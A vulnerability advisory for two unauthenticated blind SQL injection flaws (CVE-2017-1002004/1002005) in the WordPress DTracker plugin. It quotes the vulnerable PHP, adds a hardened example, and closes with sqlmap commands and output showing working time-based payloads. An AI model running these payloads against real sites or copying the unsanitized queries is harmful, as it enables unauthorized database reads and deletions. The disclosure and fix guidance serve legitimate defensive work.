Advisory #: 183
Title: Multiple Blind SQL injection vulnerability in WordPress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID: CVE-2017-1002004, CVE-2017-1002005
CWE: CWE-89 SQL Injection
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=183
Description: Track the details of the users downloading the PDF files from a WordPress site.
Vulnerability:
CVE-2017-1002004:
In ./dtracker/download.php the value of the id request parameter is not sanitized before it is concatenated onto the end of an SQL query:

$doc_id = $_GET['id'];  // taken verbatim from the query string, no validation or casting
$file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );  // $doc_id interpolated directly into the statement

The user does not need to be authenticated to the WordPress installation to exploit this vulnerability.
CVE-2017-1002005:
In ./dtracker/delete.php the value of the contact_id POST parameter is not sanitized before it is concatenated onto the end of an SQL query:

$contact_id = $_POST['contact_id']; // Contact ID to be deleted, taken verbatim from the POST body
$query = "DELETE FROM wp_contacts WHERE id = $contact_id";  // $contact_id interpolated directly into the statement
$wpdb->query($query); // Delete the contact

The user does not need to be authenticated to the WordPress installation to exploit this vulnerability.
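Both findings share the same root cause: a request parameter is interpolated into SQL text instead of being bound as a typed value, and in delete.php there is no authorization check at all. The following is an added example written for this advisory, not the DTracker plugin's own code, showing hardened versions of the two query sites. It assumes it runs inside WordPress (global $wpdb, absint(), current_user_can(), wp_verify_nonce() and WP_Error are WordPress core); the function names, the 'manage_options' capability, the nonce action string and the {$wpdb->prefix}contacts table name are assumptions for the example.

```php
<?php
// Added example (not the DTracker plugin's own code): hardened versions of the two
// query sites described in CVE-2017-1002004 and CVE-2017-1002005. Assumes it runs
// inside WordPress, where $wpdb, absint(), current_user_can(), wp_verify_nonce()
// and WP_Error are provided by core.

// CVE-2017-1002004 pattern: download.php reads $_GET['id'] straight into SQL.
// Hardened: coerce to a non-negative integer and bind it through $wpdb->prepare().
function dtracker_example_get_document( $raw_id ) {
    global $wpdb;

    $doc_id = absint( $raw_id );            // "5 OR SLEEP(5)" becomes 5; "abc" becomes 0
    if ( 0 === $doc_id ) {
        return null;                        // nothing to look up, and nothing to inject
    }

    // %d placeholder: $wpdb->prepare() casts the argument to int and substitutes it,
    // so the query text never contains attacker-controlled characters.
    // {$wpdb->posts} replaces the hard-coded "wp_posts" so non-default prefixes work.
    $sql = $wpdb->prepare( "SELECT * FROM {$wpdb->posts} WHERE ID = %d", $doc_id );
    return $wpdb->get_row( $sql );
}

// CVE-2017-1002005 pattern: delete.php runs DELETE with $_POST['contact_id'] inlined
// and without authentication. Hardened: require a logged-in user with a suitable
// capability, verify a nonce tied to this action, then delete with a typed value via
// $wpdb->delete(). The capability and nonce action string are assumptions.
function dtracker_example_delete_contact( array $post ) {
    global $wpdb;

    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'forbidden', 'Not allowed.', array( 'status' => 403 ) );
    }

    $nonce = isset( $post['_wpnonce'] ) ? $post['_wpnonce'] : '';
    if ( ! wp_verify_nonce( $nonce, 'dtracker_delete_contact' ) ) {
        return new WP_Error( 'bad_nonce', 'Invalid request.', array( 'status' => 403 ) );
    }

    $contact_id = isset( $post['contact_id'] ) ? absint( $post['contact_id'] ) : 0;
    if ( 0 === $contact_id ) {
        return new WP_Error( 'bad_id', 'Invalid contact id.', array( 'status' => 400 ) );
    }

    // $wpdb->delete() builds "DELETE FROM <table> WHERE id = %d" internally from the
    // format array, so the id is bound as an integer rather than interpolated.
    $table   = $wpdb->prefix . 'contacts';   // assumed table name, from the advisory's "wp_contacts"
    $deleted = $wpdb->delete( $table, array( 'id' => $contact_id ), array( '%d' ) );

    return ( false === $deleted ) ? new WP_Error( 'db_error', 'Delete failed.' ) : $deleted;
}
```

The integer coercion alone already closes the injection in both cases, since the time-based payloads in the sqlmap output below depend on the parameter value reaching the query as SQL text; the capability and nonce checks address the separate problem that delete.php performed a destructive action for unauthenticated callers.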
Exploit Code:

$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*' --dbms mysql --level 3 --risk 3
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
---
[10:14:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
[10:14:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 14 times
[10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*' --dbms mysql --risk 1 --level 3
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
---
[11:53:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
[11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
Screen Shots:
Notes: